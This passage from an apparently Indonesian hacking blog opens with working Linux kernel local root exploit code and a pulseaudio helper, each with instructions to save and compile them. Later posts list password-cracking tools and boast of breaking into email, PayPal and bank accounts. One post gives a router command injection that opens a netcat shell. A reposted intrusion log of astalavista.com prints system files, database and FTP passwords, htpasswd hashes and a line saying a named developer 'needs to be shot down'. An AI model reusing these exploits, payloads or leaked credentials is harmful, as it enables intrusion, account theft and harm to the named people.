PAGE!\n");             return 1;         }     }      fprintf(stdout, " [+] MAPPED ZERO PAGE!\n");      /* make an mmap handler for the tun device at 0x1        mmap fop offset is sizeof(ptr) * 11     */         tun_mmap_fop = (unsigned long *)(get_kernel_sym("tun_fops") + (sizeof(unsigned long) * 11));      selinux_enforcing = (int *)get_kernel_sym("selinux_enforcing");     //selinux_enabled = (int *)get_kernel_sym("selinux_enabled");     //selinux_mls_enabled = (int *)get_kernel_sym("selinux_mls_enabled");     //ss_initialized = (int *)get_kernel_sym("ss_initialized");      apparmor_enabled = (int *)get_kernel_sym("apparmor_enabled");     apparmor_complain = (int *)get_kernel_sym("apparmor_complain");     apparmor_audit = (int *)get_kernel_sym("apparmor_audit");     apparmor_logsyscall = (int *)get_kernel_sym("apparmor_logsyscall");      nf_unregister_hooks = (_nf_unregister_hooks)get_kernel_sym("nf_unregister_hooks");     //selinux_ipv4_ops = (unsigned long *)get_kernel_sym("selinux_ipv4_ops");     //selinux_ipv6_ops = (unsigned long *)get_kernel_sym("selinux_ipv6_ops");      security_ops = (unsigned long *)get_kernel_sym("security_ops");     default_security_ops = get_kernel_sym("default_security_ops");      //sel_read_bool = get_kernel_sym("sel_read_bool");     sel_read_enforce = get_kernel_sym("sel_read_enforce");     //security_get_bool_value = get_kernel_sym("security_get_bool_value");      //mmap_min_addr = (unsigned long *)get_kernel_sym("mmap_min_addr");      audit_enabled = (int *)get_kernel_sym("audit_enabled");      commit_creds = (_commit_creds)get_kernel_sym("commit_creds");     init_cred = get_kernel_sym("init_cred");      //sel_fs_type = get_kernel_sym("sel_fs_type");     //unregister_filesystem = (_unregister_filesystem)get_kernel_sym("unregister_filesystem");      /* we don't really need to use the NULL mapping for the kernel to redirect to        since I could have OR'd another byte in the address and turned it into        a regular allocation area.  Furthermore, this code can be placed            into a file and mmap'd RX to bypass any runtime W^X checks     */     or_one_to_kernel_address((unsigned long)tun_mmap_fop);      /* two cases, fancy trickery */     if (sizeof(unsigned int) != sizeof(unsigned long)) {         // 64bit         *(char *)1 = '\xff';         *(char *)2 = '\x25';         *(unsigned int *)3 = 0; // pc-relative and such yes ;)         *(unsigned long *)(3 + 4) = (unsigned long)&own_the_kernel;     } else {         // 32bit         *(char *)1 = '\xe9';         *(unsigned long *)2 = (unsigned long)&own_the_kernel - 6;     }      boom_goes_the_dynamite();      {         char *msg;         switch (what_we_do) {             case 1:                 msg = "AppArmor";                 break;             case 2:                 msg = "SELinux";                 break;             case 3:                 msg = "LSM";                 break;             default:                 msg = "nothing, what an insecure machine!";         }         fprintf(stdout, " [+] Disabled security of : %s\n", msg);     }     if (got_root == 1)         fprintf(stdout, " [+] Got root!\n");     else {         fprintf(stdout, " [+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?\n");         exit(0);     }     fprintf(stdout, " [+] BAM! About to launch your rootshell!...but first some chit-chat...\n");     sleep(3);     fprintf(stdout, "           ,        ,\n");     fprintf(stdout, "          /(_,    ,_)\\\n");     fprintf(stdout, "          \\ _/    \\_ /\n");     fprintf(stdout, "          //        \\\\\n");     fprintf(stdout, "          \\\\ (@)(@) //\n");     fprintf(stdout, "           \\'=\"==\"='/\n");     fprintf(stdout, "       ,===/        \\===,\n");     fprintf(stdout, "      \",===\\        /===,\"\n");     fprintf(stdout, "      \" ,==='------'===, \"\n");     fprintf(stdout, "       \"                \"\n");     fprintf(stdout, "Do you know the deadliest catch?\n");     {         char buf[20];         fgets(buf, sizeof(buf)-1, stdin);     }     sleep(1);     fprintf(stdout, "That's right! MAN is the deadliest catch of all!\n");     sleep(2);     {         char wait[] = "WAIIIIIIIIIITTTT....";         int i;         for (i = 0; i < sizeof(wait); i++) {             fprintf(stdout, "%c", wait[i]);             fflush(stdout);             usleep(200 * 1000);         }     }     fprintf(stdout, "do you hear it?\n");     sleep(2);     fprintf(stdout, "You hear it! You do too! It's not just me!  It's here, it's here I say!!\n");     sleep(3);     fprintf(stdout, "I must face this....\n");     fprintf(stdout, "\x7");     fflush(stdout);     sleep(1);     fprintf(stdout, "\x7");     fflush(stdout);     sleep(1);     fprintf(stdout, "\x7");     fflush(stdout);     sleep(1);      fprintf(stdout, "What's this? Something stirs within the beast's belly! Something unexpected");     fflush(stdout);     usleep(500 * 1000);     fprintf(stdout, ".");     fflush(stdout);     usleep(500 * 1000);     fprintf(stdout, ".");     fflush(stdout);     usleep(500 * 1000);     fprintf(stdout, ".");     fflush(stdout);     usleep(500 * 1000);     fprintf(stdout, ".");     fflush(stdout);     usleep(500 * 1000);     fprintf(stdout, "\n");     sleep(3);      execl("/bin/sh", "/bin/sh", "-i", NULL);      return 0; }  void pa__done(void *m) {     return; }  int main(void) {   pa__init(NULL); }  /* A clock struck noon; Lucien rose.  The metamorphosis was complete:    a graceful, uncertain adolescent had entered this cafe one hour    earlier; now a man left, a leader among Frenchmen.  Lucien took a few    steps in the glorious light of a French morning.  At the corner of    Rue des Ecoles and the Boulevard Saint-Michel he went towards a    stationery shop and looked at himself in the mirror: he would have    liked to find on his own face the impenetrable look he admired on    Lemordant's.  But the mirror only reflected a pretty, headstrong    little face that was not yet terrible.  "I'll grow a moustache,"    he decided. */        /* d21d0f5d64a84e1bdd2a440fcef3265996f3a1fe */

 -----------------------paste here-------------------------------------- 
save file exploits.c   
---------------------cute here---------------------------------------


 
#include 
#include 
#include 
#include 
#include 

#define PULSEAUDIO_PATH "/usr/bin/pulseaudio"
#define PATH_TO_EXPLOIT "/home/spender/exploit.so"

int main(void)
{
   int ret;
   struct stat fstat;

   ret = personality(PER_SVR4);

   if (ret == -1) {
       fprintf(stderr, "Unable to set personality!\n");
       return 0;
   }

   fprintf(stdout, " [+] Personality set to: PER_SVR4\n");

   if (stat(PULSEAUDIO_PATH, &fstat)) {
       fprintf(stderr, "Pulseaudio does not exist!\n");
       return 0;
   }

   if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) {
       fprintf(stderr, "Pulseaudio is not suid root!\n");
       return 0;
   }
 
   execl(PULSEAUDIO_PATH, PULSEAUDIO_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL);

   return 0;
}


-----------------paste here------------------------

save with pwnkernel.c



Labels: Catatan Si Vina Newbie


On 11/3/09 at 

11:37 PM




Voip Hacking
sebenernya ini artikel jadul ,
tapi yaudah daripada ga ada topict , mendingan di share aja deh 
heuheuheuheu 


cara untuk Spoofing Caller ID bisa memakai voipbuster

cara untuk spoffing card bisa memakai spoffcard

cara untuk mendiagnosa traffict voip , ataupun kita bahkan bisa melacak dan mengambil alih saluran orang lain , bisa juga memakai chain abel 

silahkan berkreasi sendiri ^_^


thnx

elv1n4
Labels: Catatan Si Vina Newbie


On 10/19/09 at 

2:10 AM




Maraknya Malware Tahun ini
Topik ini diangkat karena memang pada tahun ini kasus dalam pengambil alihan account banyak menggunakan malware ataupun teknik phising . 
ya ya ya . banyak yang mengincar account facebook,online banking,email,dsb.
bentuk tekniknya sangat bervariant, antar lain ada yang menggunakan Social Networks Evil Twin Attacks,ssid-script-injection,yang dapat saja mepoisoning jaringan wireless, dan memasukan malware sehingga Pc yang terjaring pada jaringan tersebut dapat di kuasai oleh attacker , heuheuheue :P
sangat aneh sekali, mungkin si attacker lebih baik memilik jalan ini daripada harus melakukan social engineering, heuheuheuheu :P
apalagi menggunakan bot-net untuk melakukan phising account orang lain .
waduhh udah kaya negara china aja nih indonesia , 
banyak main bot-net .


untuk itu berhati-hatilah terhadap serangan yang tidak kita ketahui apalagi dalam jaringan wireless ataupun jaringan kabel. agar komputer kita tidak menjadi bot / zombie bila sudah terkena malware , segeralah scan malware tersebut menggunakan antivirus atau antimalware. 
atau kalian juga bisa mendownloadnya disini 
http://www.novirusthanks.org/
heuheuheuheu :P






tHx 

ELv1N4
Labels: Catatan Si Vina Newbie


On 9/6/09 at 

2:16 PM




AMANKAH ANDA ???
Pada Study kasus kali ini vina akan bahas tentang konsep pembobolan password dan pengamannya , mungkin banyak artikel yang lebih baik dari pada artikel vina ini.
tapi vina disini hanya ingin menyumbangkan pengetahuan tentang topict .

ok.langsung aja deh.

===============================================
 pengertian umum               
===============================================
 password bisa di bilang sebagai kata          
kunci pengaman data penting kita, ya        
demi keamanan data sehingga oranglain    
tidak bisa melihat/ membuka file tertentu
untuk itu diperlukan sebuah password.     
===============================================

===============================================
  enkripsi password            
===============================================
Bilamana password sudah masuk dalam sys   
maka sys akan menerima sebagai plaintext,
namun apabila kita ingin memperketat keama-
nan, maka kita setting sys untuk dapat mer-
ubah plaintext menjadi beberapa passwd yg
rancu / terenkripsi seperti contoh : 
--------------------------------------------
9205d0de2847ad2a99f4e24d837a97d9  (md5)
elvinadabidu                  (plaintext)
--------------------------------------------
dalam konsep proteksi passwd tsb mngkn akn
menjdikan attacker kebingungan menebak pass
namun jenis passwd enkripsi md5 itu sangat
mudah sekali di tembus oleh para cracker
nah loh bingung yah, kenapa md5 bisa d tbk ?
karena md5 bukan jenis algoritma enkripsi
md5 adlh Enkripsi mengubah plain-text menjadi
ciphertext yang ukurannya berbanding lurus
dengan ukuran file aslinya. Semakin panjang
plain-text maka hasil enkripsinya juga
semakin panjang. Hasil enkripsi bisa 
dikembalikan ke plaintext semula dengan
proses dekripsi. Jadi enkripsi adalah fungsi
dua arah dan reversible. Selain itu dalam
enkripsi dibutuhkan kunci, tanpa kunci itu
namanya bukan enkripsi, melainkan hanya
encoding/decoding.                   
nah ada beberapa kelemahan md5 juga seperti:
-> kekuatan password yang begitu lemah
-> banyaknya vulner akibat tabrakan hash yg-
sama.(IF MD5(X)=MD5(Y) MD5(X+q) = MD5(Y+q)
                             
                             
===============================================
JENIS - JENIS ALGORITMA ENKRIPSI
===============================================
1. md5,md4,md2           
2. sha1          
3. sha224                
4. sha256                  
5. sha384             
6. sha512
7. base_64
8. rot_13
9. crc32
10.gost    
11.salt
12.md5 rainbow
===============================================
  CARA MELEMAHKANNYA           
==============================================
1.md5crackeronline                  
2.salty-py  www.code.google.com/p/salty-py/
3.salty-py  www.code.google.com/p/salty-py/
4.salty-py  www.code.google.com/p/salty-py/
5.salty-py  www.code.google.com/p/salty-py/
6.salty-py  www.code.google.com/p/salty-py/
7.base64crack    www5.rptea.com/base64/
8.your logical because this pass its weak
9.CRC32 Hash Generator online       
10.Encryption Workshop 3.0 Build/altavista
11.bruteforce,insidepro passwordspro 
12.http://reusablesec.googlepages.com/drcrack
===============================================

nah bagaimana nih jika ini terjadi pada anda ?
bilamana itu terjadi maka akan seperti contoh di bawah ini



email attacked by me : smart attack 



paypalaccount attacked by me : Bruteforce 


account banking attacked by me : Session Extending attack 





facebook account attacked by me :  SNMP XSS Attack






tHx

ELV1N4
Labels: Catatan Si Vina Newbie


On 9/1/09 at 

2:46 AM




analisa mikrotik
zaman sekarang semakin banyak host semakin banyak juga suatu workgroup yang mempunyai suatu router alias server pembagi daya 
heuheuheuheu :P 

nah timbul keingin tahuan yang mendalam tentang konsep jaringan mikrotik router dan blabla bla bla . 

nah disini kita belajar bersama - sama aja yah . 
mulai dari konsep pengertian mikrotik router
ok ;) 

MikroTik Routeradalah sistem operasi dan perangkat lunak yang dapat digunakan untuk menjadikan komputer menjadi router network yang cepat, dengan berbagai fitur yang dibuat untuk ip ( internet protokol ) network dan jaringan wireless (tanpa kabel).
dengan artian kata lain sebagai alat jembatan jaringan internet, ya banyak variant kegunaan dan fungsinya antara lain : sebagai pembagi konektifitas (bandwith) inet,memblokir beberapa situs yang di inginkan dan sebagai salah satu firewall pada jaringan, dsb 
untuk konsep setting menyetingnya banyak kok di google . 
cari aja , pasti ada deh :P 
heuheuheuheu :P 


nah sekarang gini, timbul pertanyaan apakah bisa server mikrotik itu bisa kita tembus ? 

jawabannya adalah :: imposible its nothing .... 
heuheuheuheu :P ( gaya banget yah bahasanya )

yuk kita cari cara untuk bisa memasuki jaringan winbox dan OsRouter . 

heuheuheuheu :P
lanjootttt
klo menurut vina sih mikrotik itu adalah sebagian dari firmware httpd server yang lanyaknya seperti server biasa yang mempunyai vulnerability ( cacat ). 
sebagian besar source dalam httpd.c yang terdapat dalam mikrotik itu banyak mengandung unsur vulner . dengan catatan bisa di tembus bisa juga tidak . 
sebagai contoh :

http://127.0.0.1/cgi-bin/;command_to_execute 
http://127.0.0.1/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

teknik RCE pada router dengan port 5555


pertanyaan lagi nih :: bagaimana cara mendapatkan password winbox untuk mendapatkan akses luas dalam pembagian source dll  ? 

jawabannya adalah  :: winbox tak hanya bisa di akses melalui web doang , tetapi bisa di akses melaui ssh atau telnet box ,atau juga terminal 
jadi ya kita harus memainkan logika aja disini. 
kita bisa gunakan cara bruteforce dengan memanfaatkan port yang terbuka.( jika server firewall dalam winbox belum di setting untuk menangkal serangan bruteforce .)
klo misalkan ga bisa ( banyak jalan menuju roma ) 
heuheuheuheuheu :P
coba pake lain
heuheuheuheu :P 
untuk caranya bisa gunakan openssh local exploits 
untuk archive bisa di cari dimana saja 
ya rusak rusakan dikit gpp kan ;P 
klo udah dapet password yang ter encrypt . pasti encryptsi yang di pake crc32 . 




regard 

eLv1N4
Labels: Catatan Si Vina Newbie


On 8/19/09 at 

1:34 PM




ASTALAVISTA DI HAJAR HABIS - HABISAN
situs security dan hacking yang berdiri pada tahun 2001 ini memang begitu tidak asing lagi bagi kalangan IT Profesional ataupun kalangan peretas [script kiddies]. 

dalam ajang audit site ,sampai dengan explorasi security system terbuka dalam FORUM ASTALAVISTA ini . Dan pada kali ini baru saja situs yang tepatnya beralamat di http://astalavista.com di susupi oleh HACKER yang profesional yang bernama anti-sec group 

wah wah . . serem juga yah . team yang berhasil melumpuhkan situs http://milw0rm.com Hackforums.net  dan pada tanggal 10 Juli 2009 juga menyerang situs penyedia layanan upload gambar http://imageshack.us .. 

heuheuheuheu :P 

dalam aksinya si attacker mampu menyentuh semua system dalam nya . 

dalam Akses R00tnya si attacker mencoba membedah semua isi dalam site tersebut .



kita lihat dalam metode yang di lakukan si attacker yang hebat ini

============================================================

anti-sec:~# ./g0tshell astalavista.com -p 80

	[+] Connecting to astalavista.com:80

	[+] Grabbing banner...

		LiteSpeed

	[+] Injecting shellcode...

	[-] Wait for it

	

	[~] We g0tshell

		uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

		ID: uid=100(apache) gid=500(apache) groups=500(apache)

	

sh-3.2$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

news:x:9:13:news:/etc/news:

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

rpm:x:37:37::/var/lib/rpm:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

nscd:x:28:28:NSCD Daemon:/:/sbin/nologin

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

pcap:x:77:77::/var/arpwatch:/sbin/nologin

named:x:25:25:Named:/var/named:/sbin/nologin

apache:x:100:500::/var/www:/bin/false

diradmin:x:101:101::/usr/local/directadmin:/bin/bash

mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash

webapps:x:500:501::/var/www/html:/bin/bash

majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash

admin:x:501:502::/home/admin:/bin/bash

jon:x:502:503::/home/jon:/bin/bash

com:x:503:504::/home/com:/bin/bash

ntp:x:38:38::/etc/ntp:/sbin/nologin

ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin

astanet:x:504:505::/home/astanet:/bin/bash

avahi:x:70:70:Avahi daemon:/:/sbin/nologin

avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin



sh-3.2$ cat /etc/hosts

# Do not remove the following line, or various programs

# that require network functionality will fail.

127.0.0.1       localhost.localdomain   localhost

::1     localhost6.localdomain6 localhost6

80.74.154.172           asta1.astalavistaserver.com



sh-3.2$ pwd

/home/com/public_html



sh-3.2$ ls -la

total 18460

drwxr-xr-x 30 com apache     4096 May 28 17:06 .

drwx--x--x 11 com com        4096 Jun 25  2008 ..

drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin

drwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache

drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin

drwxrwxrwx  2 com com        4096 May 19 00:50 config

drwxr-xr-x  2 com com        4096 Mar 20 11:05 core

drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules

drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing

drwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo

drwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__

-rw-r--r--  1 com com        8035 May 19 14:26 directory_to_mediadir.php

drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd

drwxr-xr-x  3 com com        4096 Feb  2 19:29 editor

-rw-r--r--  1 com com        3750 Feb 27 16:12 favicon.ico

drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed

-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess

-rw-r--r--  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak

-rw-r--r--  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak

drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool

drwxrwxrwx 14 com com        4096 Feb  2 19:29 images

-rw-r--r--  1 com com       97496 Jun  2 13:01 index.php

drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer

drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang

drwxr-xr-x 22 com com        4096 Feb  2 19:29 lib

drwxrwxrwx 12 com com        4096 Jun  2 07:47 media

drwxr-xr-x  8 com com        4096 May 11 12:48 modifications

drwxr-xr-x 34 com com        4096 May 28 16:30 modules

drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin

drwxrwxr-x 22 com com        4096 May 28 17:06 _new

drwxr-xr-x 26 com com        4096 Feb  2 19:27 _old

drwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy

drwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy

-rw-r--r--  1 com com          26 Feb  2 19:33 robots.txt

-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml

-rw-r--r--  1 com com         223 Mar 30 15:32 test.php

drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes

drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp

drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam



sh-3.2$ head -20 index.php



/**

 * The main page for the CMS

 * @copyright   CONTREXX CMS - COMVATION AG

 * @author      Comvation Development Team

 * @version     v1.0.9.10.1 stable

 * @package        contrexx

 * @subpackage    core

 * @link        http://www.contrexx.com/ contrexx homepage

 * @since       v0.0.0.0

 * @todo        Capitalize all class names in project

 * @uses        /config/configuration.php

 * @uses        /config/settings.php

 * @uses        /config/version.php

 * @uses        /core/API.php

 * @uses        /core_modules/cache/index.class.php

 * @uses        /core/error.class.php

 * @uses        /core_modules/banner/index.class.php

 * @uses        /core_modules/contact/index.class.php

 

sh-3.2$ cd config/

sh-3.2$ ls -la

total 32

drwxrwxrwx  2 com com    4096 May 19 00:50 .

drwxr-xr-x 30 com apache 4096 May 28 17:06 ..

-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php

-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php

-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php

-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php



sh-3.2$ cat configuration.php

[snip]

$_DBCONFIG['host'] = 'localhost'; // This is normally set to localhost

$_DBCONFIG['database'] = 'com_contrexx2_live'; // Database name

$_DBCONFIG['tablePrefix'] = 'contrexx_'; // Database table prefix

$_DBCONFIG['user'] = 'contrexxuser2'; // Database username

$_DBCONFIG['password'] = '0fEYNZgXz1pKe'; // Database password

$_DBCONFIG['dbType'] = 'mysql'; // Database type (e.g. mysql,postgres ..)

$_DBCONFIG['charset'] = 'utf8'; // Charset (default, latin1, utf8, ..)

[snip]

$_FTPCONFIG['is_activated'] = true; // Ftp support true or false

$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode

$_FTPCONFIG['host']     = 'localhost';// This is normally set to localhost

$_FTPCONFIG['port'] = 21; // Ftp remote port

$_FTPCONFIG['username'] = 'dev@astalavista.com'; // Ftp login username

$_FTPCONFIG['password'] = 'jajklop0Iuj'; // Ftp login password

$_FTPCONFIG['path']     = '/'; // Ftp path to cms



sh-3.2$ cd ..

sh-3.2$ cd dvd/

sh-3.2$ ls -la

total 2913780

drwxr-xr-x  2 com com          4096 Sep  9  2008 .

drwxr-xr-x 30 com apache       4096 May 28 17:06 ..

-rw-r--r--  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar

-rw-r--r--  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar

-rw-r--r--  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar

-rw-r--r--  1 com com           115 Jan 29  2008 .htaccess



sh-3.2$ cat .htaccess

authType Basic

authName DVD

authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd

require valid-user



sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd

DVDdownload:CRD8cuY6.MPT6

DVDdownload2:CR8a36.wluFMg



sh-3.2$ cat test.php

$url = 'aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9

pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D';

$url = str_replace(array('&', '&'), '&', base64_decode(rawurldecode($url)));

echo $url;

?>



sh-3.2$ cd modifications/

sh-3.2$ ls -la

total 32

drwxr-xr-x  8 com com    4096 May 11 12:48 .

drwxr-xr-x 30 com apache 4096 May 28 17:06 ..

drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng

drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs

drwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools

drwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc

drwxr-xr-x  2 com com    4096 Feb  2 19:33 search

drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp



sh-3.2$ ls -R

.:

com_avtng  cronjobs  onlinetools  pjirc  search  _tmp



./com_avtng:

avtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts



./com_avtng/scripts:

popunder.js



./cronjobs:

exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp



./cronjobs/tmp:

contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv



./onlinetools:

index.php



./pjirc:

a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt

AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt

background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd



./pjirc/img:

ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif

arbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif    

verre-eau.gif

argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif   

verre-vin.gif

ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif

biere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif



./pjirc/snd:

bell2.au  ding.au



./search:

searchEngines.php  search.php



./_tmp:

defaultPorts.php  defaultPorts.txt



sh-3.2$ cd cronjobs/

sh-3.2$ cat exploits.php

[snip]

$categories   = array();

$milw0rmFile  = FULLPATH . '/modifications/cronjobs/tmp/milw0rm/sploitlist.txt';

$expolits     = file($milw0rmFile);

$comExploits  = array();

[snip]

// manage data

for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640



    // get path and title

    $expolits[$x] = trim($expolits[$x]);

    $path         = str_replace('./', FULLPATH . '/modifications/cronjobs/tmp/milw0rm/', substr($expolits[$x], 0, strpos($expolits[$x], ' ')));

    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ' ') + 1, strlen($expolits[$x])), ENT_QUOTES);



    // check if file exists

    if (file_exists($path)) {



        $text = file_get_contents($path);



        // get content and date

        //$text = htmlspecialchars($text, ENT_QUOTES);

        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, "UTF-8"));

        if ($tmptext != '') {

            $text = $tmptext;

        } else {

            $text = addslashes(htmlentities($text,  ENT_QUOTES));

        }

        $date = str_replace('milw0rm.com [', '', str_replace(']', '', strstr($text, 'milw0rm.com [')));

        $tmp  = explode('-', $date);

        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));

        $cat  = getCategory ($path);

        $ext  = pathinfo(basename($path));

        $ext  = $ext['extension'];

        $qStr = "

            SELECT  `id`

            FROM    `contrexx_module_exploits`

            WHERE   `title`  =  '" . $title . "'

            AND     `date`   =  '" . $date . "'

        ";

        echo $x + 1 . ' von ' . count($expolits) . ' -> ' . $qStr . "\n";

        $q = $_objDB->query($qStr);



        if ($q->numRows() == 0) {



            // prepare array

            $comExploits[$x]['date']      = $date;

            $comExploits[$x]['title']     = $title;

            $comExploits[$x]['author']    = 'milw0rm';

            $comExploits[$x]['text']      = $text;

            $comExploits[$x]['source']    = $ext;

            $comExploits[$x]['url1']      = '';

            $comExploits[$x]['url2']      = '';

            $comExploits[$x]['catid']     = $cat;

            $comExploits[$x]['lang']      = '2';

            $comExploits[$x]['userid']    = '12';

            $comExploits[$x]['startdate'] = '0000-00-00';

            $comExploits[$x]['enddate']   = '0000-00-00';

            $comExploits[$x]['status']    = '1';

            $comExploits[$x]['changelog'] = $date;



        }

[snip]

    $xml = '



    

        

        http://www.astalavista.com/exploits

        All availably Exploits.

        en-us

        ' . date('F, j M Y H:i:s O') . '

        http://blogs.law.harvard.edu/tech/rss

        Astalavista.com

        info@astalavista.com' . $items . '

    



';





    if (file_exists(FULLPATH . '/feed/exploits.xml')) {

        unlink (FULLPATH . '/feed/exploits.xml');

    }





    file_put_contents(FULLPATH . '/feed/exploits.xml', $xml);

[snip]



sh-3.2$ cat exploits.sh

#!/bin/sh

###########################################################

#                                                         #

#   Title:        milw0rm exploits adder                  #

#   Description:  Add all milw0rm exploits to the         #

#                 Astalavista.com database                #

#                                                         #

#   Company:      Astalavista Group                       #

#   Author:       Paulo M. Santos                         #

#   E-Mail:       paulo.santos@astalavista.ch             #

#                                                         #

###########################################################





# path

this_path=/home/com/public_html/modifications/cronjobs



# change directory

cd $this_path

cd tmp/



# delete files

rm -rf milw0rm.tar.* &

rm -rf milw0rm/ &



# wget milw0rm paket

wget http://www.milw0rm.com/sploits/milw0rm.tar.bz2



# extract milw0rm paket

tar -xvf milw0rm.tar.bz2



# change owner

chown -R com .

chgrp -R com .



# execute php script

cd $this_path

php -q exploits.php



# delete files

rm -rf tmp/milw0rm.tar.*

rm -rf tmp/milw0rm/



sh-3.2$ echo "Paulo M. Santos needs to be shot down."

Paulo M. Santos needs to be shot down.



mysql -u contrexxuser2 -p

Enter password:

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 261694

Server version: 5.0.45-community-log MySQL Community Edition (GPL)



Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> show databases;

+--------------------+

| Database           |

+--------------------+

| information_schema |

| com_contrexx2      |

| com_contrexx2_live |

| test               |

+--------------------+

4 rows in set (0.00 sec)



mysql> use com_contrexx2_live

Database changed

mysql> show tables;

+--------------------------------------------------+

| Tables_in_com_contrexx2_live                     |

+--------------------------------------------------+

| cc_banner_counter                                |

| cc_search_counter                                |

| contrexx_access_group_dynamic_ids                |

| contrexx_access_group_static_ids                 |

| contrexx_access_rel_user_group                   |

